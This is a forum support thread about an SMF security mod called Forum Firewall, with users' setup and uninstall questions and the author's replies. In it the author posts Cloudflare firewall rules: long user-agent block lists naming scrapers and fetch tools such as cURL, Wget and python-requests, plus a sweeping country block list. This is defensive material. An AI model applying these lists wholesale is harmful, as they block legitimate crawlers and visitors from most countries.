am I more exposed than I think I am ?
Title: Re: Forum Firewall
Post by: butchs on July 09, 2017, 03:36:38 PM
It too me a little over a year of hard work to write this software.  Honestly, I have no idea what you did so I cannot answer your question.
Title: Re: Forum Firewall
Post by: brynn on July 10, 2017, 05:14:41 AM
Hi Friends,
When I first started my forum, someone else set it up for me (4 years ago) and also hosted it for me.  Now I've moved on to a new host, and there are many things I need to learn, to continue managing my forum.

This is one of the mods about which I understand very little.  I've looked through the files, and read the readme.  But it doesn't tell me much about how to use it.  Even with the help info (question mark icons next to each setting in the control panel), I'm still struggling with a lot of those settings.

Is there somewhere I can read about all the features, which explains it for someone who is new to forum security?  I tried the link to SMF Helper website, hoping there might be some tutorials or something.  But it doesn't seem to be exist anymore.

I could ask my questions here, I suppose.  But I really need more of an introduction, or even a guide which I could study.  Can anyone suggest where I can start learning about this?

Thank you very much.
Title: Re: Forum Firewall
Post by: butchs on July 10, 2017, 07:09:30 PM
To be honest,this mod is not for newbies.  I suggest using BadBehavor with CrawlProtect and some user questions.

I spent some time making tutorials throughout this thread.  I then added them to my first post.  Someone who I have a pretty good idea who decided to replace that post with the first post for the mod.  If you feel energetic you can find them...

Title: Re: Forum Firewall
Post by: brynn on July 10, 2017, 09:05:06 PM
Thanks butchs.

I already do have Bad Behavior, which at least I understand the concept, and might even be able to set it up on my own, if I had to.  Actually have the whole security setup that was created for me originally.  (Forum Firewall, Bad Behavior, Stop Spammer)  I just need to learn how to use them all.  Because I'm guessing having moved to a new server, I might have to change some settings - ip address maybe, in some mods?

I've never heard of CrawlProtect, and don't find any mod by that name.  Oh ok, I found.  I will investigate.

When you say "some user questions", do you mean of the type "are you human?" on registration?  Yes, I have what I think are some very strong questions there.  Or do you mean I should ask user questions about security in the forum?

Do you mean the tutorials are scattered in this thread?  Or are they all over the forum?  If I find them, I'll make a list with links, so others can find them.

Maybe it would be better for me to shoot for a more broad goal for learning about forum or website security.  Do you (or anyone) know of any articles or tutorials or websites which address this general subject?  I need to start learning somehow. 

I certainly will search myself.  But not knowing the proper terminology, will limit what I can find.

I mean, there must be best practices, or something like that?  Something that compare/contrast different methods and techniques, pros and cons, and all that.  I'll search, but appreciate any tips, if anyone has any.

Thanks again   :)
Title: Re: Forum Firewall
Post by: aegersz on July 11, 2017, 06:51:01 AM
Quote from: butchs on July 09, 2017, 03:36:38 PM
It too me a little over a year of hard work to write this software.  Honestly, I have no idea what you did so I cannot answer your question.

wow, a whole year ? i am running it on my dev system now, on the strength of that !

I'm still relatively new to the world of web enabled software so I don't really understand many of my vulnerabilities well enough.

I will do some research into the features that this offers and that should be educational. thanks. 
Title: Re: Forum Firewall
Post by: butchs on September 24, 2017, 07:51:55 AM
If you are upgrading SMF to v2.0.14 and currently have this mod installed you will have to uninstall this mod, then update SMF to v2.0.14 and then reinstall this mod.
Title: Re: Forum Firewall
Post by: dynaweb on January 30, 2018, 03:52:31 PM
Just an FYI that I installed this plugin yesterday and my Maldet scanner quarantined it as a trojan. 2.X latest version got it from this site :(
Title: Re: Forum Firewall
Post by: butchs on February 01, 2018, 06:17:02 PM
Funny, so they finally caught up to FF as FF has been doing this since 2010!  So you run a program that scans for malware on a program that scans for malware and input from malware and you think this is an issue?  Of course NOT, FF uses the same search strings?  Either make FF a safe program or delete something. 

Please note that FF scans files too.  But FF stops malware when they attack not after it is on your server. 
Title: Re: Forum Firewall
Post by: sieemma on April 30, 2018, 10:21:19 AM
If I leave all the cells that ask to input codes, will FF still work?
Where they ask to input xx/yy
Title: Re: Forum Firewall
Post by: butchs on June 10, 2018, 09:47:14 AM
I do not understand.
Title: Re: Forum Firewall
Post by: butchs on July 21, 2019, 02:57:45 PM
Dear FF users,
As some of you know I designed FF to work with cloudflare (CF) and detect when CF is bypassed.  Some of the feature I added I did so because they were not available in CF at the time.  Now that CF has caught up with bots and country blocking for free services I can decrease the stress on my forum even more with "Firewall Rules".  You are only allower 5 rules with the free service.  I still keep my settings in FF just in case it is bypassed and I duplicate most of the settings in CF.

Here are some suggested rules (see attached list):
Bad Bots 1 (http.user_agent contains "@nonymouse") or (http.user_agent contains "ADSARobot") or (http.user_agent contains "ah-ha") or (http.user_agent contains "Ahrefs") or (http.user_agent contains "AhrefsBot") or (http.user_agent contains "aktuelles") or (http.user_agent contains "almaden") or (http.user_agent contains "amzn_assoc") or (http.user_agent contains "Anarchie") or (http.user_agent contains "Art-Online") or (http.user_agent contains "AspiWeb") or (http.user_agent contains "ASPSeek") or (http.user_agent contains "ASSORT") or (http.user_agent contains "ATHENS") or (http.user_agent contains "Atomz") or (http.user_agent contains "attach") or (http.user_agent contains "attache") or (http.user_agent contains "autoemailspider") or (http.user_agent contains "BackWeb") or (http.user_agent contains "Bandit") or (http.user_agent contains "BatchFTP") or (http.user_agent contains "bdfetch") or (http.user_agent contains "Baiduspider") or (http.user_agent contains "Baiduspider-image") or (http.user_agent contains "Baiduspider-video") or (http.user_agent contains "Baiduspider-news") or (http.user_agent contains "Baiduspider-favo") or (http.user_agent contains "Baiduspider-cpro") or (http.user_agent contains "Baiduspider-ads") or (http.user_agent contains "BlackWidow") or (http.user_agent contains "BLEXBot") or (http.user_agent contains "bmclient") or (http.user_agent contains "BUbiNG") or (http.user_agent contains "Buddy") or (http.user_agent contains "Bullseye") or (http.user_agent contains "bumblebee") or (http.user_agent contains "capture") or (http.user_agent contains "CCBot") or (http.user_agent contains "CherryPicker") or (http.user_agent contains "ChinaClaw") or (http.user_agent contains "CICC") or (http.user_agent contains "clipping") or (http.user_agent contains "CFNetwork") or (http.user_agent contains "cURL") or (http.user_agent contains "Custo") or (http.user_agent contains "cyberalert") or (http.user_agent contains "Deweb") or (http.user_agent contains "diagem") or (http.user_agent contains "Digger") or (http.user_agent contains "DigExt") or (http.user_agent contains "Digimarc") or (http.user_agent contains "DIIbot") or (http.user_agent contains "DirectUpdate") or (http.user_agent contains "DISCo") or (http.user_agent contains "Drip") or (http.user_agent contains "DSurf15a") or (http.user_agent contains "EasyDL") or (http.user_agent contains "eCatch") or (http.user_agent contains "ecollector") or (http.user_agent contains "EirGrabber") or (http.user_agent contains "EmailCollector") or (http.user_agent contains "EmailSiphon") or (http.user_agent contains "EmailWolf") or (http.user_agent contains "ExtractorPro") or (http.user_agent contains "EyeNetIE") or (http.user_agent contains "Ezooms") or (http.user_agent contains "fastlwspider")

Bad Bots 2(http.user_agent contains "FavOrg") or (http.user_agent contains "FEZhead") or (http.user_agent contains "FileHound") or (http.user_agent contains "FlashGet") or (http.user_agent contains "FlickBot") or (http.user_agent contains "fluffy") or (http.user_agent contains "frontpage") or (http.user_agent contains "GalaxyBot") or (http.user_agent contains "Generic") or (http.user_agent contains "Getleft") or (http.user_agent contains "GetSmart") or (http.user_agent contains "GetWeb!") or (http.user_agent contains "GetWebPage") or (http.user_agent contains "gigabaz") or (http.user_agent contains "Girafabot") or (http.user_agent contains "Go!Zilla") or (http.user_agent contains "Go-Ahead-Got-It") or (http.user_agent contains "GornKer") or (http.user_agent contains "Grabber") or (http.user_agent contains "GrabNet") or (http.user_agent contains "Grafula") or (http.user_agent contains "Harvest") or (http.user_agent contains "hhjhj@yahoo") or (http.user_agent contains "hloader") or (http.user_agent contains "HMView") or (http.user_agent contains "HomePageSearch") or (http.user_agent contains "HTTPConnect") or (http.user_agent contains "httpdown") or (http.user_agent contains "HTTrack") or (http.user_agent contains "IBM_Planetwide") or (http.user_agent contains "ichiro") or (http.user_agent contains "imagefetch") or (http.user_agent contains "IncyWincy") or (http.user_agent contains "informant") or (http.user_agent contains "Ingelin") or (http.user_agent contains "InterGET") or (http.user_agent contains "InternetLinkAgent") or (http.user_agent contains "iOpus") or (http.user_agent contains "Iria") or (http.user_agent contains "Irvine") or (http.user_agent contains "Jakarta") or (http.user_agent contains "JBH*Agent") or (http.user_agent contains "JetCar") or (http.user_agent contains "JustView") or (http.user_agent contains "Kapere") or (http.user_agent contains "knowledge") or (http.user_agent contains "KWebGet") or (http.user_agent contains "Lachesis") or (http.user_agent contains "larbin") or (http.user_agent contains "LeechFTP") or (http.user_agent contains "LexiBot") or (http.user_agent contains "lftp") or (http.user_agent contains "libwww") or (http.user_agent contains "likse") or (http.user_agent contains "Link*Sleuth") or (http.user_agent contains "LinkWalker") or (http.user_agent contains "lwp-trivial") or (http.user_agent contains "majestic12") or (http.user_agent contains "Mag-Net") or (http.user_agent contains "Magnet") or (http.user_agent contains "MCspider") or (http.user_agent contains "MemoWeb") or (http.user_agent contains "moget") or (http.user_agent contains "MSProxy") or (http.user_agent contains "multithreaddb") or (http.user_agent contains "muckrack") or (http.user_agent contains "MJ12") or (http.user_agent contains "nationaldirectory") or (http.user_agent contains "NaverBot") or (http.user_agent contains "Navroad") or (http.user_agent contains "NearSite") or (http.user_agent contains "NetAnts") or (http.user_agent contains "NetCarta") or (http.user_agent contains "netcraft") or (http.user_agent contains "netfactual") or (http.user_agent contains "NetMechanic") or (http.user_agent contains "netprospector") or (http.user_agent contains "NetResearchServer") or (http.user_agent contains "NetSpider") or (http.user_agent contains "NetZIP") or (http.user_agent contains "NEWT") or (http.user_agent contains "nicerspro") or (http.user_agent contains "NPBot") or (http.user_agent contains "Octopus") or (http.user_agent contains "OpaL") or (http.user_agent contains "Openfind") or (http.user_agent contains "OpenTextSiteCrawler") or (http.user_agent contains "OutWit") or (http.user_agent contains "PackRat") or (http.user_agent contains "PageGrabber") or (http.user_agent contains "pavuk") or (http.user_agent contains "pcBrowser") or (http.user_agent contains "PersonaPilot") or (http.user_agent contains "PingALink") or (http.user_agent contains "Pockey") or (http.user_agent contains "psbot") or (http.user_agent contains "PSurf") or (http.user_agent contains "puf") or (http.user_agent contains "Pump")

Bad Bots 3 (http.user_agent contains "PushSite") or (http.user_agent contains "python-requests") or (http.user_agent contains "QRVA") or (http.user_agent contains "Qwantify") or (http.user_agent contains "QuepasaCreep") or (http.user_agent contains "RealDownload") or (http.user_agent contains "Reaper") or (http.user_agent contains "Recorder") or (http.user_agent contains "ReGet") or (http.user_agent contains "replacer") or (http.user_agent contains "RepoMonkey") or (http.user_agent contains "Robozilla") or (http.user_agent contains "Rover") or (http.user_agent contains "RPT-HTTPClient") or (http.user_agent contains "Rsync") or (http.user_agent contains "scoutjet") or (http.user_agent contains "Scrapy") or (http.user_agent contains "SearchExpress") or (http.user_agent contains "searchhippo") or (http.user_agent contains "Shai") or (http.user_agent contains "SISTRIX") or (http.user_agent contains "sitecheck") or (http.user_agent contains "Semrush") or (http.user_agent contains "SemrushBot") or (http.user_agent contains "SiteMapper") or (http.user_agent contains "SiteSnagger") or (http.user_agent contains "SlySearch") or (http.user_agent contains "SmartDownload") or (http.user_agent contains "snagger") or (http.user_agent contains "Sogou") or (http.user_agent contains "sogou spider") or (http.user_agent contains "SpaceBison") or (http.user_agent contains "spbot") or (http.user_agent contains "Spegla") or (http.user_agent contains "SpiderBot") or (http.user_agent contains "SqWorm") or (http.user_agent contains "Stripper") or (http.user_agent contains "Sucker") or (http.user_agent contains "SuperBot") or (http.user_agent contains "SuperHTTP") or (http.user_agent contains "Surfbot") or (http.user_agent contains "SurfWalker") or (http.user_agent contains "Szukacz") or (http.user_agent contains "TalkTalk") or (http.user_agent contains "tAkeOut") or (http.user_agent contains "tarspider") or (http.user_agent contains "Telesoft") or (http.user_agent contains "Templeton") or (http.user_agent contains "traffixer") or (http.user_agent contains "TrueRobot") or (http.user_agent contains "TuringOS") or (http.user_agent contains "TurnitinBot") or (http.user_agent contains "TV33_Mercator") or (http.user_agent contains "UIowaCrawler") or (http.user_agent contains "URL_Spider_Pro") or (http.user_agent contains "UtilMind") or (http.user_agent contains "Vacuum") or (http.user_agent contains "vagabondo") or (http.user_agent contains "vayala") or (http.user_agent contains "visibilitygap") or (http.user_agent contains "vobsub") or (http.user_agent contains "VoidEYE") or (http.user_agent contains "vspider") or (http.user_agent contains "w3mir") or (http.user_agent contains "WebAuto") or (http.user_agent contains "webbandit") or (http.user_agent contains "Webclipping") or (http.user_agent contains "webcollage") or (http.user_agent contains "webcollector") or (http.user_agent contains "WebCopier") or (http.user_agent contains "webcraft@bea") or (http.user_agent contains "WebDAV") or (http.user_agent contains "webdevil") or (http.user_agent contains "webdownloader") or (http.user_agent contains "Webdup") or (http.user_agent contains "WebEmailExtractor") or (http.user_agent contains "WebFetch") or (http.user_agent contains "WebHook") or (http.user_agent contains "Webinator") or (http.user_agent contains "WebLeacher") or (http.user_agent contains "WebMiner") or (http.user_agent contains "WebMirror") or (http.user_agent contains "webmole") or (http.user_agent contains "WebReaper") or (http.user_agent contains "WebSauger") or (http.user_agent contains "WEBsaver") or (http.user_agent contains "WebSnake") or (http.user_agent contains "Webster") or (http.user_agent contains "WebStripper") or (http.user_agent contains "websucker") or (http.user_agent contains "webvac")

Bad Bots 4 (http.user_agent contains "webwalk") or (http.user_agent contains "webweasel") or (http.user_agent contains "WebWhacker") or (http.user_agent contains "WebZIP") or (http.user_agent contains "Wget") or (http.user_agent contains "whizbang") or (http.user_agent contains "WhosTalking") or (http.user_agent contains "Widow") or (http.user_agent contains "WISEbot") or (http.user_agent contains "WUMPUS") or (http.user_agent contains "Wweb") or (http.user_agent contains "WWWOFFLE") or (http.user_agent contains "Wysigot") or (http.user_agent contains "x-Tractor") or (http.user_agent contains "XGET") or (http.user_agent contains "Yandex") or (http.user_agent contains "YoudaoBot") or (http.user_agent contains "Yeti") or (http.user_agent contains "80legs") or (http.user_agent contains "Zeus.*")

Block Countries (ip.geoip.country in {"AD" "AE" "AF" "AG" "AI" "AL" "AM" "AN" "AO" "AQ" "AR" "AS" "AT" "AW" "AX" "AZ" "BA" "BB" "BD" "BE" "BF" "BG" "BH" "BI" "BJ" "BN" "BO" "BR" "BT" "BV" "BW" "BY" "BZ" "CC" "CD" "CF" "CG" "CH" "CI" "CK" "CL" "CM" "CN" "CO" "CR" "CV" "CX" "CY" "CZ" "DE" "DJ" "DK" "DM" "DO" "DZ" "EC" "EE" "EH" "ER" "ET" "FI" "FJ" "FK" "FM" "FO" "FR" "GA" "GE" "GF" "GG" "GH" "GI" "GL" "GM" "GN" "GP" "GQ" "GS" "GT" "GU" "GW" "GY" "HK" "HM" "HN" "HR" "HT" "HU" "ID" "IM" "IQ" "IO" "IR" "IS" "JE" "JM" "JO" "KE" "KG" "KH" "KI" "KM" "KN" "KP" "KR" "KZ" "LA" "LB" "LC" "LI" "LK" "LR" "LS" "LT" "LU" "LV" "LY" "MA" "MC" "MD" "ME" "MG" "MH" "MK" "ML" "MM" "MN" "MO" "MP" "MQ" "MR" "MS" "MT" "MU" "MV" "MW" "MY" "MZ" "NC" "NE" "NF" "NG" "NI" "NL" "NO" "NP" "NR" "NU" "OM" "PA" "PE" "PF" "PG" "PK" "PL" "PM" "PN" "PR" "PS" "PT" "PW" "PY" "QA" "RE" "RO" "RS" "RU" "RW" "SA" "SB" "SC" "SD" "SE" "SG" "SH" "SI" "SJ" "SK" "SL" "SM" "SN" "SO" "SR" "ST" "SV" "SY" "SZ" "TC" "TD" "TF" "TG" "TH" "TJ" "TK" "TL" "TM" "TN" "TO" "TR" "TT" "TV" "TW" "TZ" "UA" "UG" "UY" "UZ" "VC" "VE" "VG" "VI" "VN" "VU" "WF" "WS" "YE" "YT" "ZA" "ZM" "ZW"} and not cf.client.bot)

Be carefull with the las tone as I live in the US and it may block you if you live elsewhere.  Please check you website before leaving for the night.

If you have better tested rules please post them here...
Title: Re: Forum Firewall
Post by: Мel on February 01, 2020, 03:59:34 PM
Hi! After deleting FF for some tests, I get this error below.
Any tips how to handle it?
Title: Re: Forum Firewall
Post by: Shambles on February 01, 2020, 06:09:06 PM
Quote from: Мel
After deleting FF for some tests ...

Did you uninstall the mod or just hard delete some of its artifacts?   If you went down the 'uninstall' route it looks like you may have ignored some warnings issued.
Title: Re: Forum Firewall
Post by: Мel on February 02, 2020, 02:37:20 AM
Quote from: Shambles on February 01, 2020, 06:09:06 PM
Quote from: Мel
After deleting FF for some tests ...

Did you uninstall the mod or just hard delete some of its artifacts?   If you went down the 'uninstall' route it looks like you may have ignored some warnings issued.
I've uninstalled a mod via admin panel with an error in Subs-Members.php, then I've clean up manually, following the manual for the mod. Still...
Title: Re: Forum Firewall
Post by: butchs on February 02, 2020, 01:25:29 PM
I always add the install sequence number to a mod when I install it so I can uninstall in order.

The error you are having is not related to a problem in the mod.  It is the manual clean-up.  Maybe you can recover your directory from a back-up.
Title: Re: Forum Firewall
Post by: Andres08 on March 23, 2020, 10:09:55 PM
Hello,

On my forum your mod can´t pass through due to template fails in instalation. I using 2.0.17 version.

Amdres
Title: Re: Forum Firewall
Post by: butchs on March 24, 2020, 02:06:14 PM
The mod is made for the default theme.
Title: Re: Forum Firewall
Post by: Kindred on March 24, 2020, 06:03:18 PM
Andres08

https://wiki.simplemachines.org/smf/Error_in_mod_installation
Title: Re: Forum Firewall
Post by: Andres08 on April 09, 2020, 11:47:43 PM
Quote from: Kindred on March 24, 2020, 06:03:18 PM
Andres08

https://wiki.simplemachines.org/smf/Error_in_mod_installation

Thank you Kindred.  I installed that Firewall, but have other dificulties regarding my forum, so it will go down I think.   
Andres
Title: Re: Forum Firewall
Post by: [email protected] on December 07, 2021, 02:49:58 AM
I am getting an error in the SMF logs.

: Trying to access array offset on value of type bool
/var/www/weatheryyc.com/smf/Sources/ForumFirewall.php
Line: 159

Can  anyone tell me how to fix it?
Title: Re: Forum Firewall
Post by: Kindred on December 07, 2021, 09:00:38 AM
I suspect that this mod would require some fairly major updates to be compatible with 2.0.18 and php 7.x
Title: Re: Forum Firewall
Post by: [email protected] on December 07, 2021, 08:35:25 PM
I agree. I wish t he author would update it.
Title: Re: Forum Firewall
Post by: sinnerman on May 25, 2022, 08:38:20 AM
Hi!

can someone please post the 2.0.0 package?!

I have it installed in my forum since earlier than 2016 it seems but somehow I'm missing the package in Packages folder and I can't uninstall it!!
Title: Re: Forum Firewall
Post by: Kindred on May 25, 2022, 09:08:32 AM
The license of this mod means that the download from the nod site is the only valid distribution other than something directly from the author.
Title: Re: Forum Firewall
Post by: sinnerman on May 25, 2022, 11:29:41 AM
Thank you of course you're right, still there no more need for it.
downloaded 2.0.1 package and removed every mod it did manually.
After that I installed 2.0.1 and uninstalled it to remove db residues.
I think I covered it.  :)